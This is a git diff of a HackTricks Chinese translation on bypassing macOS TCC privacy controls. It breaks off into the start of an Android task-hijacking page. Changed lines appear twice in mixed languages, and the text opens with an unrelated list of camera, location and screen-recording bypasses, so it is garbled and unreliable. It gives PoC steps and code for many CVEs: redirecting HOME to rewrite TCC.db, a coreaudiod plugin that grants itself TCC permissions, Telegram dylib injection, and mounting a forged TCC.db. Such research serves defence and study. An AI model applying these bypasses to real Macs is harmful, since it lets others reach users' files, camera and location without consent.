3. **bypass-camera.md**: Learn how to bypass TCC limitations and access the camera without user permission.
4. **bypass-location-services.md**: This document details a method to bypass TCC settings and access location services without user acknowledgment.
5. **bypass-screen-recording.md**: Find out how to bypass TCC security measures and perform screen recording without user awareness.
#### Disclaimer
These techniques are for educational purposes only. Misuse of these bypass methods may violate laws and regulations.
{% endcode %}
```bash
osascript iterm.script
```
#### 通过Finder
#### 通过 Finder
或者如果一个应用程序可以通过Finder访问它可以执行类似这样的脚本:
或者如果一个应用程序可以访问 Finder它可以使用这样的脚本
```applescript
set a_user to do shell script "logname"
tell application "Finder"
@ -145,14 +126,14 @@ set t to paragraphs of (do shell script "cat " & POSIX path of (copyFile as alia
end tell
do shell script "rm " & POSIX path of (copyFile as alias)
```
## 通过应用程序行为
## By App behaviour
### CVE-20209934 - TCC <a href="#c19b" id="c19b"></a>
用户空间的 **tccd 守护程序** 使用 **`HOME`** **env** 变量来访问 TCC 用户数据库**`$HOME/Library/Application Support/com.apple.TCC/TCC.db`**
用户空间的 **tccd 守护进程** 使用 **`HOME`** **环境** 变量来访问 TCC 用户数据库,路径为**`$HOME/Library/Application Support/com.apple.TCC/TCC.db`**
根据[这篇 Stack Exchange 帖子](https://stackoverflow.com/questions/135688/setting-environment-variables-on-os-x/3756686#3756686),由于 TCC 守护程序通过 `launchd` 在当前用户域内运行,可以**控制传递给它的所有环境变量**。\
因此,**攻击者可以在 `launchctl` 中设置 `$HOME` 环境** 变量指向一个**受控** **目录****重新启动** TCC 守护程序,然后**直接修改 TCC 数据库**,从而获得**所有可用的 TCC 权限**,而无需提示最终用户。\
根据 [这篇 Stack Exchange 文章](https://stackoverflow.com/questions/135688/setting-environment-variables-on-os-x/3756686#3756686),由于 TCC 守护进程通过 `launchd` 在当前用户的域中运行,因此可以 **控制传递给它的所有环境变量**。\
因此,**攻击者可以在 `launchctl` 中设置 `$HOME` 环境** 变量指向一个 **受控** **目录****重启** **TCC** 守护进程,然后 **直接修改 TCC 数据库** 以使其 **获得所有可用的 TCC 权限**,而无需提示最终用户。\
PoC:
```bash
# reset database just in case (no cheating!)
@ -180,93 +161,92 @@ NULL,
# list Documents directory without prompting the end user
$> ls ~/Documents
```
### CVE-2021-30761 - Notes
### CVE-2021-30761 - 备注
Notes可以访问TCC受保护的位置但是当创建一个笔记时它会**创建在一个非受保护的位置**。因此您可以要求Notes将受保护的文件复制到一个笔记中因此在非受保护的位置),然后访问该文件:
Notes 可以访问 TCC 保护的位置,但当创建一个笔记时,这个笔记是 **在一个非保护的位置创建的**。因此,你可以要求 Notes 将一个受保护的文件复制到一个笔记中(即在一个非保护的位置),然后访问该文件:
<figure><img src="../../../../../.gitbook/assets/image (476).png" alt=""><figcaption></figcaption></figure>
### CVE-2021-30782 - Translocation
### CVE-2021-30782 - 迁移
二进制文件`/usr/libexec/lsd`与库`libsecurity_translocate`具有授权`com.apple.private.nullfs_allow`,允许其创建**nullfs**挂载,并具有授权`com.apple.private.tcc.allow`与**`kTCCServiceSystemPolicyAllFiles`**以访问每个文件。
二进制文件 `/usr/libexec/lsd` 与库 `libsecurity_translocate` 具有特权 `com.apple.private.nullfs_allow`,这允许它创建 **nullfs** 挂载,并且具有特权 `com.apple.private.tcc.allow`,以 **`kTCCServiceSystemPolicyAllFiles`** 访问每个文件。
可以向“Library”添加隔离属性调用**`com.apple.security.translocation`** XPC服务然后它会将Library映射到**`$TMPDIR/AppTranslocation/d/d/Library`**其中Library中的所有文档都可以**访问**
可以将隔离属性添加到“Library”调用 **`com.apple.security.translocation`** XPC 服务,然后它会将 Library 映射到 **`$TMPDIR/AppTranslocation/d/d/Library`**,其中 Library 内的所有文档都可以 **访问**
### CVE-2023-38571 - 音乐电视 <a href="#cve-2023-38571-a-macos-tcc-bypass-in-music-and-tv" id="cve-2023-38571-a-macos-tcc-bypass-in-music-and-tv"></a>
### CVE-2023-38571 - 音乐电视 <a href="#cve-2023-38571-a-macos-tcc-bypass-in-music-and-tv" id="cve-2023-38571-a-macos-tcc-bypass-in-music-and-tv"></a>
**`Music`**有一个有趣的功能:当它运行时,它会将拖放到**`~/Music/Music/Media.localized/Automatically Add to Music.localized`**的文件导入到用户的“媒体库”。此外,它调用类似于:**`rename(a, b);`**其中`a`和`b`为
**`Music`** 有一个有趣的功能:当它运行时,它会 **导入** 被拖放到 **`~/Music/Music/Media.localized/Automatically Add to Music.localized`** 的文件到用户的“媒体库”。此外,它调用类似于:**`rename(a, b);`** 的操作,其中 `a``b`
* `a = "~/Music/Music/Media.localized/Automatically Add to Music.localized/myfile.mp3"`
* `b = "~/Music/Music/Media.localized/Automatically Add to Music.localized/Not Added.localized/2023-09-25 11.06.28/myfile.mp3`
这个**`rename(a, b);`**行为容易受到**竞争条件**的影响,因为可以将一个伪造的**TCC.db**文件放入`Automatically Add to Music.localized`文件夹中然后当创建新文件夹b复制文件删除它并将其指向**`~/Library/Application Support/com.apple.TCC`**。
这个 **`rename(a, b);`** 行为容易受到 **竞争条件** 的影响,因为可以在 `Automatically Add to Music.localized` 文件夹中放置一个假的 **TCC.db** 文件然后在创建新文件夹b时复制该文件删除它并指向 **`~/Library/Application Support/com.apple.TCC`**。
### SQLITE\_SQLLOG\_DIR - CVE-2023-32422
如果**`SQLITE_SQLLOG_DIR="path/folder"`**基本上意味着**任何打开的数据库都会被复制到该路径**。在这个CVE中滥用了这个控制以便在将要由带有FDA TCC数据库的进程打开的**SQLite数据库**中**写入**,然后通过**在文件名中创建符号链接**滥用**`SQLITE_SQLLOG_DIR`**,因此当打开该数据库时,用户的**TCC.db被覆盖**。
**更多信息**[**在写作中**](https://gergelykalman.com/sqlol-CVE-2023-32422-a-macos-tcc-bypass.html)**和**[**在讲座中**](https://www.youtube.com/watch?v=f1HA5QhLQ7Y\&t=20548s)。
如果 **`SQLITE_SQLLOG_DIR="path/folder"`**,基本上意味着 **任何打开的数据库都会被复制到该路径**。在这个 CVE 中,这个控制被滥用以 **写入** 一个 **SQLite 数据库**,该数据库将被 **一个具有 FDA 的进程打开 TCC 数据库**,然后滥用 **`SQLITE_SQLLOG_DIR`**,在文件名中使用 **符号链接**,因此当该数据库被 **打开** 时,用户的 **TCC.db 被覆盖** 为打开的那个。\
**更多信息** [**在写作中**](https://gergelykalman.com/sqlol-CVE-2023-32422-a-macos-tcc-bypass.html) **和**[ **在演讲中**](https://www.youtube.com/watch?v=f1HA5QhLQ7Y\&t=20548s)。
### **SQLITE\_AUTO\_TRACE**
如果设置了环境变量**`SQLITE_AUTO_TRACE`**,库**`libsqlite3.dylib`**将开始**记录**所有SQL查询。许多应用程序使用这个库因此可以记录它们所有的SQLite查询。
如果环境变量 **`SQLITE_AUTO_TRACE`** 被设置,库 **`libsqlite3.dylib`** 将开始 **记录** 所有SQL 查询。许多应用程序使用这个库,因此可以记录它们所有的 SQLite 查询。
几个苹果应用程序使用了这个库来访问TCC受保护的信息。
多个 Apple 应用程序使用这个库来访问 TCC 保护的信息。
```bash
# Set this env variable everywhere
launchctl setenv SQLITE_AUTO_TRACE 1
```
### MTL_DUMP_PIPELINES_TO_JSON_FILE - CVE-2023-32407
### MTL\_DUMP\_PIPELINES\_TO\_JSON\_FILE - CVE-2023-32407
这个**环境变量被`Metal`框架使用**,这是各种程序的依赖,尤其是`Music`,它有FDA。
这个 **env 变量被 `Metal` 框架使用**,这是多个程序的依赖,最显著的是 `Music`,它具有 FDA。
设置以下内容:`MTL_DUMP_PIPELINES_TO_JSON_FILE="路径/名称"`。如果`路径`是一个有效的目录,该漏洞将被触发,我们可以使用`fs_usage`查看程序的运行情况
设置以下内容:`MTL_DUMP_PIPELINES_TO_JSON_FILE="path/name"`。如果 `path` 是有效目录,漏洞将被触发,我们可以使用 `fs_usage` 查看程序中发生的事情
* 一个文件将被`open()`,名为`路径/.dat.nosyncXXXX.XXXXXX`X为随机值
* 一个或多个`write()`将内容写入文件(我们无法控制)
* `路径/.dat.nosyncXXXX.XXXXXX`将被`rename()`为`路径/名称`
* 一个文件将被 `open()`,名为 `path/.dat.nosyncXXXX.XXXXXX`X 是随机的
* 一个或多个 `write()` 将内容写入文件(我们无法控制这一点
* `path/.dat.nosyncXXXX.XXXXXX` 将被 `renamed()``path/name`
这是一个临时文件写入,接着是一个**不安全的`rename(old, new)`**。
这是一个临时文件写入,随后是一个 **`rename(old, new)`** **这不是安全的。**
不安全,因为它必须**分别解析旧路径和新路径**,这可能需要一些时间,并且容易受到竞争条件的影响。更多信息可以查看`xnu`函数`renameat_internal()`。
这不安全,因为它必须 **分别解析旧路径和新路径**,这可能需要一些时间,并且可能容易受到竞争条件的影响。有关更多信息,您可以查看 `xnu` 函数 `renameat_internal()`
{% hint style="danger" %}
所以,基本上,如果一个特权进程正在从你控制的文件夹重命名你可以获得一个RCE并让它访问不同的文件或者像在这个CVE中那样打开特权应用程序创建的文件并存储一个FD。
所以,基本上,如果一个特权进程正在从您控制的文件夹重命名,您可能会获得 RCE 并使其访问不同的文件,或者像在这个 CVE 中那样,打开特权应用程序创建的文件并存储一个 FD。
如果重命名访问你控制的文件夹同时你已经修改了源文件或者有一个FD指向它你可以将目标文件或文件夹更改为指向符号链接这样你可以随时写入。
如果重命名访问一个您控制的文件夹,同时您已修改源文件或拥有其 FD您可以将目标文件或文件夹更改为指向一个符号链接这样您可以随时写入。
{% endhint %}
这是CVE中的攻击示例例如为了覆盖用户的`TCC.db`,我们可以:
这是 CVE 中的攻击:例如,要覆盖用户的 `TCC.db`,我们可以:
* 创建`/Users/hacker/ourlink`指向`/Users/hacker/Library/Application Support/com.apple.TCC/`
* 创建目录`/Users/hacker/tmp/`
* 设置`MTL_DUMP_PIPELINES_TO_JSON_FILE=/Users/hacker/tmp/TCC.db`
* 运行`Music`时使用这个环境变量触发漏洞
* 捕获`/Users/hacker/tmp/.dat.nosyncXXXX.XXXXXX`的`open()X为随机值`
* 在这里我们也为写入打开这个文件,并保留文件描述符
* 在一个循环中原子地将`/Users/hacker/tmp`切换为`/Users/hacker/ourlink`
* 我们这样做是为了最大化我们成功的机会,因为竞争窗口非常狭窄,但是失败的风险可以忽略不计
* 等一会儿
* 创建 `/Users/hacker/ourlink` 指向 `/Users/hacker/Library/Application Support/com.apple.TCC/`
* 创建目录 `/Users/hacker/tmp/`
* 设置 `MTL_DUMP_PIPELINES_TO_JSON_FILE=/Users/hacker/tmp/TCC.db`
* 通过运行带有此 env 变量的 `Music`触发漏洞
* 捕获 `/Users/hacker/tmp/.dat.nosyncXXXX.XXXXXX``open()`X 是随机的)
* 在这里我们也 `open()` 这个文件以进行写入,并保持文件描述符
* 原子性地在 `/Users/hacker/tmp``/Users/hacker/ourlink` 之间切换 **在一个循环中**
* 我们这样做是为了最大化成功的机会,因为竞争窗口非常小,但输掉比赛的代价微乎其微
* 等一会儿
* 测试我们是否幸运
* 如果没有,从头再来
更多信息请查看[https://gergelykalman.com/lateralus-CVE-2023-32407-a-macos-tcc-bypass.html](https://gergelykalman.com/lateralus-CVE-2023-32407-a-macos-tcc-bypass.html)
更多信息请查看 [https://gergelykalman.com/lateralus-CVE-2023-32407-a-macos-tcc-bypass.html](https://gergelykalman.com/lateralus-CVE-2023-32407-a-macos-tcc-bypass.html)
{% hint style="danger" %}
现在,如果你尝试使用环境变量`MTL_DUMP_PIPELINES_TO_JSON_FILE`,应用程序将无法启动
现在,如果您尝试使用 env 变量 `MTL_DUMP_PIPELINES_TO_JSON_FILE`,应用程序将无法启动
{% endhint %}
### Apple 远程桌面
### Apple Remote Desktop
作为root用户你可以启用这项服务**ARD代理将具有完全磁盘访问权限**,用户可以利用这一点让其复制一个新的**TCC用户数据库**
作为 root您可以启用此服务**ARD 代理将具有完全的磁盘访问权限**,这可能会被用户滥用以使其复制新的 **TCC 用户数据库**
## 通过 **NFSHomeDirectory**
TCC在用户的HOME文件夹中使用一个数据库来控制用户特定资源的访问路径为**$HOME/Library/Application Support/com.apple.TCC/TCC.db**。\
因此,如果用户设法使用指向**不同文件夹**的$HOME环境变量重新启动TCC用户可以在**/Library/Application Support/com.apple.TCC/TCC.db**中创建一个新的TCC数据库并欺骗TCC授予任何应用程序任何TCC权限。
TCC 在用户的 HOME 文件夹中使用数据库来控制对特定于用户的资源的访问,路径为 **$HOME/Library/Application Support/com.apple.TCC/TCC.db**。\
因此,如果用户设法使用指向 **不同文件夹** 的 $HOME env 变量重新启动 TCC用户可以在 **/Library/Application Support/com.apple.TCC/TCC.db** 中创建一个新的 TCC 数据库,并欺骗 TCC 授予任何应用程序任何 TCC 权限。
{% hint style="success" %}
请注意,苹果使用存储在用户配置文件中的设置来确定**`NFSHomeDirectory`**属性的值为**`$HOME`**,因此,如果你入侵了一个具有修改此值权限的应用程序(**`kTCCServiceSystemPolicySysAdminFiles`**你可以利用这个选项进行TCC绕过
请注意,Apple 使用存储在用户配置文件中的 **`NFSHomeDirectory`** 属性的设置作为 **`$HOME`** 的值,因此如果您妥协了具有修改此值权限的应用程序(**`kTCCServiceSystemPolicySysAdminFiles`**),您可以通过 TCC 绕过 **武器化** 此选项
{% endhint %}
### [CVE-20209934 - TCC](./#c19b) <a href="#c19b" id="c19b"></a>
@ -275,43 +255,44 @@ TCC在用户的HOME文件夹中使用一个数据库来控制用户特定资源
### CVE-2021-30970 - Powerdir
**第一个POC**使用[dsexport](https://www.unix.com/man-page/osx/1/dsexport/)和[dsimport](https://www.unix.com/man-page/osx/1/dsimport/)来修改用户的**HOME**文件夹。
**第一个 POC** 使用 [**dsexport**](https://www.unix.com/man-page/osx/1/dsexport/) [**dsimport**](https://www.unix.com/man-page/osx/1/dsimport/) 来修改用户的 **HOME** 文件夹。
1. 为目标应用程序获取一个_csreq_ blob。
2. 放置一个带有所需访问权限和_csreq_ blob的假_TCC.db_文件。
3. 使用[dsexport](https://www.unix.com/man-page/osx/1/dsexport/)导出用户的目录服务条目。
1. 获取目标应用程序的 _csreq_ blob。
2. 植入一个带有所需访问权限和 _csreq_ blob 的假 _TCC.db_ 文件。
3. 使用 [**dsexport**](https://www.unix.com/man-page/osx/1/dsexport/) 导出用户的目录服务条目。
4. 修改目录服务条目以更改用户的主目录。
5. 使用[dsimport](https://www.unix.com/man-page/osx/1/dsimport/)导入修改后的目录服务条目。
6. 停止用户的_tccd_并重该进程。
5. 使用 [**dsimport**](https://www.unix.com/man-page/osx/1/dsimport/) 导入修改后的目录服务条目。
6. 停止用户的 _tccd_ 并重启该进程。
第二个POC使用了**`/usr/libexec/configd`**,其中具有值为`kTCCServiceSystemPolicySysAdminFiles`的`com.apple.private.tcc.allow`权限。\
通过使用**`-t`**选项运行**`configd`**,攻击者可以指定一个**自定义Bundle来加载**。因此,该漏洞利用**用`configd`代码注入**替换了更改用户主目录的**`dsexport`**和**`dsimport`**方法
第二个 POC 使用 **`/usr/libexec/configd`**,它具有 `com.apple.private.tcc.allow`,值为 `kTCCServiceSystemPolicySysAdminFiles`。\
可以使用 **`-t`** 选项运行 **`configd`**,攻击者可以指定 **自定义 Bundle 进行加载**。因此,该漏洞 **替换****`dsexport`** 和 **`dsimport`** 更改用户主目录的方法,使用 **`configd` 代码注入**
更多信息请查看[**原始报告**](https://www.microsoft.com/en-us/security/blog/2022/01/10/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access/)。
有关更多信息请查看 [**原始报告**](https://www.microsoft.com/en-us/security/blog/2022/01/10/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access/)。
## 通过进程注入
有不同的技术可以注入代码到一个进程中并滥用其TCC权限
有不同的技术可以在进程内部注入代码并滥用其 TCC 权限:
{% content-ref url="../../../macos-proces-abuse/" %}
[macos-proces-abuse](../../../macos-proces-abuse/)
{% endcontent-ref %}
此外,最常见的绕过TCC的进程注入技术是通过**插件(加载库)**。\
插件通常以库或plist的形式存在将由主应用程序**加载**并在其上下文中执行。因此如果主应用程序有权限访问TCC受限文件通过授予的权限或权限**自定义代码也将具有这些权限**。
此外,发现的最常见的通过 TCC 绕过的进程注入是通过 **插件(加载库)**。\
插件是通常以库或 plist 形式存在的额外代码,将由主应用程序 **加载** 并在其上下文中执行。因此,如果主应用程序具有对 TCC 限制文件的访问(通过授予的权限或特权),**自定义代码也将具有此权限**。
### CVE-2020-27937 - Directory Utility
应用程序`/System/Library/CoreServices/Applications/Directory Utility.app`具有权限**`kTCCServiceSystemPolicySysAdminFiles`**,加载带有**`.daplug`**扩展名的插件,并且**没有启用**强化运行时。
应用程序 `/System/Library/CoreServices/Applications/Directory Utility.app` 具有特权 **`kTCCServiceSystemPolicySysAdminFiles`**,加载了扩展名为 **`.daplug`** 的插件,并且 **没有经过强化**运行时。
为了利用这个CVE**`NFSHomeDirectory`**被**更改**(滥用之前的权限)以便能够**接管用户的TCC数据库**以绕过TCC。
为了武器化此 CVE**`NFSHomeDirectory`** 被 **更改**(滥用之前的特权),以便能够 **接管用户的 TCC 数据库** 以绕过 TCC。
有关更多信息,请查看 [**原始报告**](https://wojciechregula.blog/post/change-home-directory-and-bypass-tcc-aka-cve-2020-27937/)。
更多信息请查看[**原始报告**](https://wojciechregula.blog/post/change-home-directory-and-bypass-tcc-aka-cve-2020-27937/)。
### CVE-2020-29621 - Coreaudiod
二进制文件 **`/usr/sbin/coreaudiod`** 具有权 `com.apple.security.cs.disable-library-validation``com.apple.private.tcc.manager`。第一个权限允许**代码注入**,第二个权限允许其访问**管理 TCC**
二进制文件 **`/usr/sbin/coreaudiod`** 具有`com.apple.security.cs.disable-library-validation``com.apple.private.tcc.manager`。第一个 **允许代码注入**,第二个则赋予其 **管理 TCC** 的权限
该二进制文件允许从文件夹 `/Library/Audio/Plug-Ins/HAL` 加载**第三方插件**。因此,可以使用以下 PoC **加载插件并滥用 TCC 权限**
该二进制文件允许从文件夹 `/Library/Audio/Plug-Ins/HAL` 加载 **第三方插件**。因此,可以使用此 PoC **加载插件并滥用 TCC 权限**
```objectivec
#import <Foundation/Foundation.h>
#import <Security/Security.h>
@ -338,15 +319,15 @@ add_tcc_entry();
NSLog(@"[+] Exploitation finished...");
exit(0);
```
有关更多信息,请查看[**原始报告**](https://wojciechregula.blog/post/play-the-music-and-bypass-tcc-aka-cve-2020-29621/)。
For more info check the [**original report**](https://wojciechregula.blog/post/play-the-music-and-bypass-tcc-aka-cve-2020-29621/).
### 设备抽象层DAL插件
### 设备抽象层 (DAL) 插件
通过 Core Media I/O 打开摄像头流的系统应用程序(具有 **`kTCCServiceCamera`** 的应用程序)在进程中加载位于 `/Library/CoreMediaIO/Plug-Ins/DAL` 的这些插件(不受 SIP 限制)。
通过 Core Media I/O 打开摄像头流的系统应用程序(具有 **`kTCCServiceCamera`** 的应用程序)加载位于 `/Library/CoreMediaIO/Plug-Ins/DAL` **这些插件**(不受 SIP 限制)。
只需在那里存储一个具有常见 **构造函数** 的库即可用于 **注入代码**
只需在此存储一个带有公共 **构造函数** 的库即可 **注入代码**
个 Apple 应用程序对此存在漏洞。
个 Apple 应用程序对此存在漏洞。
### Firefox
@ -376,15 +357,17 @@ Executable=/Applications/Firefox.app/Contents/MacOS/firefox
</dict>
</plist>
```
有关如何轻松利用此漏洞的更多信息,请[**查看原始报告**](https://wojciechregula.blog/post/how-to-rob-a-firefox/)。
### CVE-2020-10006
二进制文件 `/system/Library/Filesystems/acfs.fs/Contents/bin/xsanctl` 具有权限 **`com.apple.private.tcc.allow`** **`com.apple.security.get-task-allow`**,这允许注入代码到进程中并使用 TCC 权限。
二进制文件`/system/Library/Filesystems/acfs.fs/Contents/bin/xsanctl`具有权限**`com.apple.private.tcc.allow`**和**`com.apple.security.get-task-allow`**,这允许在进程内部注入代码并使用TCC权限。
### CVE-2023-26818 - 电报
### CVE-2023-26818 - Telegram
电报具有权限 **`com.apple.security.cs.allow-dyld-environment-variables`** **`com.apple.security.cs.disable-library-validation`**,因此可以滥用它来**获取其权限**,例如使用摄像头录制。您可以在[**写作中找到有效载荷**](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/)。
Telegram具有权限**`com.apple.security.cs.allow-dyld-environment-variables`**和**`com.apple.security.cs.disable-library-validation`**,因此可以利用它**获取其权限**,例如使用相机录制。您可以[**在写作中找到有效载荷**](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/)。
注意如何使用环境变量加载库,创建了一个**自定义 plist** 来注入此库,并使用 **`launchctl`** 来启动它:
注意如何使用环境变量加载库,**创建了一个自定义plist**来注入此库,并使用**`launchctl`**来启动它:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
@ -414,15 +397,15 @@ Executable=/Applications/Firefox.app/Contents/MacOS/firefox
```bash
launchctl load com.telegram.launcher.plist
```
## 通过打开调用
## 通过 open 调用
即使在沙盒环境也可以调用**`open`**
即使在沙盒中也可以调用 **`open`**
### 终端脚本
通常会为终端授予**完全磁盘访问权限FDA**,至少在技术人员使用的计算机上是这样。可以使用它来调用**`.terminal`**脚本。
在技术人员使用的计算机上,给终端 **完全磁盘访问 (FDA)** 是很常见的。并且可以使用它调用 **`.terminal`** 脚本。
**`.terminal`** 脚本是类似于以下带有要在**`CommandString`**键中执行的命令的属性列表文件
**`.terminal`** 脚本是 plist 文件,例如这个文件,其中包含在 **`CommandString`** 键中要执行的命令
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0">
@ -440,7 +423,7 @@ launchctl load com.telegram.launcher.plist
</dict>
</plist>
```
一个应用程序可以在诸如 /tmp 这样的位置编写一个终端脚本,并使用如下命令启动它:
一个应用程序可以在 /tmp 等位置写入一个终端脚本,并使用如下命令启动它:
```objectivec
// Write plist in /tmp/tcc.terminal
[...]
@ -451,12 +434,14 @@ task.arguments = @[@"-a", @"/System/Applications/Utilities/Terminal.app",
exploit_location]; task.standardOutput = pipe;
[task launch];
```
## 通过挂载
## By mounting
### CVE-2020-9771 - mount\_apfs TCC绕过和提权
### CVE-2020-9771 - mount\_apfs TCC 绕过和权限提升
**任何用户**(甚至是非特权用户)都可以创建和挂载一个时间机器快照,并**访问该快照的所有文件**。\
唯一需要的特权是所使用的应用程序(如`Terminal`)需要具有**完全磁盘访问权限**FDA`kTCCServiceSystemPolicyAllfiles`),这需要由管理员授予。
**任何用户**(甚至是无特权用户)都可以创建并挂载时间机器快照,并**访问该快照的所有文件**。\
所需的**唯一特权**是用于访问的应用程序(如 `Terminal`)必须具有**完全磁盘访问**FDA权限`kTCCServiceSystemPolicyAllfiles`),该权限需要由管理员授予。
{% code overflow="wrap" %}
```bash
# Create snapshot
tmutil localsnapshot
@ -480,9 +465,11 @@ ls /tmp/snap/Users/admin_user # This will work
更详细的解释可以在[**原始报告中找到**](https://theevilbit.github.io/posts/cve\_2020\_9771/)**。**
### CVE-2021-1784 & CVE-2021-30808 - 挂载 TCC 文件
### CVE-2021-1784 & CVE-2021-30808 - 挂载 TCC 文件
即使 TCC DB 文件受到保护,也有可能**挂载到目录**一个新的 TCC.db 文件:
即使 TCC DB 文件受到保护,仍然可以**挂载一个新的 TCC.db 文件到该目录**
{% code overflow="wrap" %}
```bash
# CVE-2021-1784
## Mount over Library/Application\ Support/com.apple.TCC
@ -503,15 +490,15 @@ os.system("mkdir -p /tmp/mnt/Application\ Support/com.apple.TCC/")
os.system("cp /tmp/TCC.db /tmp/mnt/Application\ Support/com.apple.TCC/TCC.db")
os.system("hdiutil detach /tmp/mnt 1>/dev/null")
```
查看[**原始报告**](https://theevilbit.github.io/posts/cve-2021-30808/)中的**完整利用**
检查**完整利用**在[**原始写作**](https://theevilbit.github.io/posts/cve-2021-30808/)中。
### asr
工具**`/usr/sbin/asr`**允许复制整个磁盘并在另一个位置挂载,绕过了TCC保护。
工具**`/usr/sbin/asr`**允许复制整个磁盘并将其挂载到另一个位置,从而绕过TCC保护。
### 位置服务
在**`/var/db/locationd/clients.plist`**中有第三个TCC数据库用于指示允许**访问位置服务**的客户端。\
在**`/var/db/locationd/clients.plist`**中有一个第三个TCC数据库用于指示允许**访问位置服务**的客户端。\
文件夹**`/var/db/locationd/`没有受到DMG挂载的保护**因此可以挂载我们自己的plist。
## 通过启动应用程序
@ -522,17 +509,17 @@ os.system("hdiutil detach /tmp/mnt 1>/dev/null")
## 通过grep
许多情况下,文件会在非受保护的位置存储敏感信息,如电子邮件、电话号码、消息...(这被视为苹果的一个漏洞)。
几种情况下文件会在未受保护的位置存储敏感信息如电子邮件、电话号码、消息等……这被视为Apple的一个漏洞)。
<figure><img src="../../../../../.gitbook/assets/image (474).png" alt=""><figcaption></figcaption></figure>
## 合成点击
种方法不再有效,但在过去[**曾经有效**](https://twitter.com/noarfromspace/status/639125916233416704/photo/1)****
不再有效,但它[**在过去有效**](https://twitter.com/noarfromspace/status/639125916233416704/photo/1)**:**
<figure><img src="../../../../../.gitbook/assets/image (29).png" alt=""><figcaption></figcaption></figure>
另一种方法是使用[**CoreGraphics事件**](https://objectivebythesea.org/v2/talks/OBTS\_v2\_Wardle.pdf)
另一种使用[**CoreGraphics事件**](https://objectivebythesea.org/v2/talks/OBTS\_v2\_Wardle.pdf)的方法
<figure><img src="../../../../../.gitbook/assets/image (30).png" alt="" width="563"><figcaption></figcaption></figure>
@ -542,3 +529,18 @@ os.system("hdiutil detach /tmp/mnt 1>/dev/null")
* [**https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/**](https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/)
* [**20+ Ways to Bypass Your macOS Privacy Mechanisms**](https://www.youtube.com/watch?v=W9GxnP8c8FU)
* [**Knockout Win Against TCC - 20+ NEW Ways to Bypass Your MacOS Privacy Mechanisms**](https://www.youtube.com/watch?v=a9hsxPdRxsY)
{% hint style="success" %}
学习和实践AWS黑客攻击<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家ARTE**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践GCP黑客攻击<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家GRTE**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持HackTricks</summary>
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub库提交PR分享黑客技巧。
</details>
{% endhint %}

637
mobile-pentesting/android-app-pentesting/README.md
View file

File diff suppressed because it is too large Load diff

78
mobile-pentesting/android-app-pentesting/android-task-hijacking.md
View file

@ -1,20 +1,21 @@
# Android任务劫持
# Android 任务劫持
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
**Try Hard安全团队**
**Try Hard Security Group**
<figure><img src="../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
@ -22,64 +23,65 @@
***
## 任务、后退栈和前台活动
## 任务、后栈和前台活动
Android中**任务**本质上是用户与之交互以完成特定工作的一组活动,这些活动在**后退栈**中组织。该堆栈根据打开活动的时间顺序对活动进行排序,最近的活动显示在顶部作为**前台活动**。在任何时刻,屏幕上只有这个活动可见,使其成为**前台任务**的一部分。
